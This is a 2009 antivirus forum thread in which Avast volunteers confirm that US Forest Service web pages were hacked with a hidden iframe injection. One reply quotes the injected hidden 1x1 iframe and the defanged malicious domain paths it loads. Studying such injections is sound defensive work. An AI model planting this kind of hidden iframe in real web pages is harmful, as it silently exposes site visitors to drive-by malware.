Author Topic: Iframe-inf infects the United States Forest Service???  (Read 5841 times)

0 Members and 1 Guest are viewing this topic.

Offline cowboythecat

  • Newbie
  • *
  • Posts: 4
Iframe-inf infects the United States Forest Service???
« on: April 14, 2009, 05:31:34 PM »
Hi, I have been getting a warning that the USFS websites (all of them) are infected with Iframe-inf.

A few have gone down and now have the "experiencing technical difficulties" generic message, which leads me to believe that it may be a real threat.

But linkscanner says they are safe.

Help???

Thanks.

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67274
Re: Iframe-inf infects the United States Forest Service???
« Reply #1 on: April 14, 2009, 05:48:09 PM »
Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?
The best things in life are free.

Offline cowboythecat

  • Newbie
  • *
  • Posts: 4
Re: Iframe-inf infects the United States Forest Service???
« Reply #2 on: April 14, 2009, 05:52:52 PM »
Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?

I'm sorry, but I don't understand what you mean...  Please use "internet for dummies" terminology when asking me stuff... :-[ :P

I am not aware of a known hack of the USFS.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 83557
  • No support PMs thanks
Re: Iframe-inf infects the United States Forest Service???
« Reply #3 on: April 14, 2009, 05:59:10 PM »
Got a link ?
Change the http to hXXP in the URL to ensure it isn't active avoiding accidental exposure.

Given their message it is highly possible it has been infected.

This type of attack iframe injection is becoming more common and avast is all over it like a rash. Of all the ones I have investigated in the forums all have proved correct. However, today I have seen one that might be incorrect.

I have just checked this one out hXXp://www.fs.fed.us/ and it has most certainly been hacked, a hidden iframe pointing to a Chinese domain.

Note in the image the <h1 Forest Service Website Is Currently Unavailable /h1> (edited) now that could be part of the deception or them trying to clear up. But even the attempt to block, e.g. the unavailability page is infected.
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 1909 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 20.6.2420 (build 20.6.5495.561) UI-1.0.544/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro

Offline cowboythecat

  • Newbie
  • *
  • Posts: 4
Re: Iframe-inf infects the United States Forest Service???
« Reply #4 on: April 14, 2009, 06:05:08 PM »
Got a link ?
Change the http to hXXP in the URL to ensure it isn't active avoiding accidental exposure.

Given their message it is highly possible it has been infected.

This type of attack iframe injection is becoming more common and avast is all over it like a rash. Of all the ones I have investigated in the forums all have proved correct. However, today I have seen one that might be incorrect.

I have just checked this one out hXXp://www.fs.fed.us/ and it has most certainly been hacked, a hidden iframe pointing to a Chinese domain.

Note in the image the <h1 Forest Service Website Is Currently Unavailable /h1> (edited) now that could be part of the deception or them trying to clear up. But even the attempt to block, e.g. the unavailability page is infected.

I think the link you searched is as good as any...

I have checked multiple FS sites now and gotten the "website currently unavailable" page without a warning from avast... Does this mean I should be concerned that my computer is infected?

Running the most current version of the free program, and using the most current firefox browser.

Thanks for your replies.  Better let my coworkers who run other less-thorough antivirus programs I suppose. 8)

Offline cowboythecat

  • Newbie
  • *
  • Posts: 4
Re: Iframe-inf infects the United States Forest Service???
« Reply #5 on: April 14, 2009, 06:09:35 PM »
Sorry, here's a link to one of the "down" sites with an unavailable message

hxxp://www.fs.fed.us/r9/shawnee/

From viewing the source, it looks legit.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 83557
  • No support PMs thanks
Re: Iframe-inf infects the United States Forest Service???
« Reply #6 on: April 14, 2009, 07:18:24 PM »
Those page that you are getting the message without an avast alert, I can only assume have been cleaned but the site I guess won't be available until they resolve not only the removal of the injected iframes but how they got there and to close that vulnerability.

So without URLs for those you can view without alert there is no way to confirm that they have in fact been cleaned. Though there is more than enough evidence that they have been hacked. If as you say this spreads over multiple sites, though I only see links for the one fs.fed.us domain it could be an orchestrated attack.

Sorry, here's a link to one of the "down" sites with an unavailable message

hxxp://www.fs.fed.us/r9/shawnee/

From viewing the source, it looks legit.

Your viewing of the source is different to mine as this too has most certainly been hacked (see image), with the same injection of a hidden iframe pointing to a Chinese domain...

So I don't see how you are able to see the page with the unavailable message, though that would also depend on your browser (?)
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 1909 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 20.6.2420 (build 20.6.5495.561) UI-1.0.544/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Iframe-inf infects the United States Forest Service???
« Reply #7 on: April 14, 2009, 07:37:19 PM »
Hi DavidR:

Here the results of the Bad Stuff Detektor:
Total zeroiframes found: 1

Check took 6.95 seconds

(Level: 0) Url checked:
hxxp://www.fs.fed.us/
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/in.cgi?income56
Zeroiframes detected on this site: 0
No ad codes identified
Code: [Select]
<iframe src="hxxp://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

(Level: 2) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/cache/readme.pdf
Blank page / could not connect
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/cache/flash.swf
Blank page / could not connect
No ad codes identified


polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline scythe944

  • Avast Evangelist
  • Massive Poster
  • ***
  • Posts: 2913
    • My Tech Blog
Re: Iframe-inf infects the United States Forest Service???
« Reply #8 on: April 15, 2009, 04:13:52 AM »
Quote
I am not aware of a known hack of the USFS.

We found one on the US International Trade Commission site...
http://forum.avast.com/index.php?topic=43712

I think they were down for a little over a week after I notified them.

US government sites seem to be getting hit hard these days.
For generic computer (not avast) problems, you can also visit my forum for help: http://www.jacobytech.net/forum

Offline CharleyO

  • Avast Evangelist
  • Starting Graphoman
  • ***
  • Posts: 7086
  • Be alert for error code - ID 10T
Re: Iframe-inf infects the United States Forest Service???
« Reply #9 on: April 15, 2009, 09:36:47 AM »
***

The website at ... www.fs.fed.us/r9/shawnee/ ... is currently down apparently to repair the infection.

See the image below. Click to enlarge.


***
Self-built desktop (8 years old) - AMD64 3200+_Gigabyte GA-K8NS Ultra-939_4 gb RAM_GeForceFX 5800w/256 ram_XP/SP3_Avast 7_MBAM_ZA Free __and__ Toshiba Satellite Laptop_W7-64bit_ 4 gb Ram_Avast 8_MBAM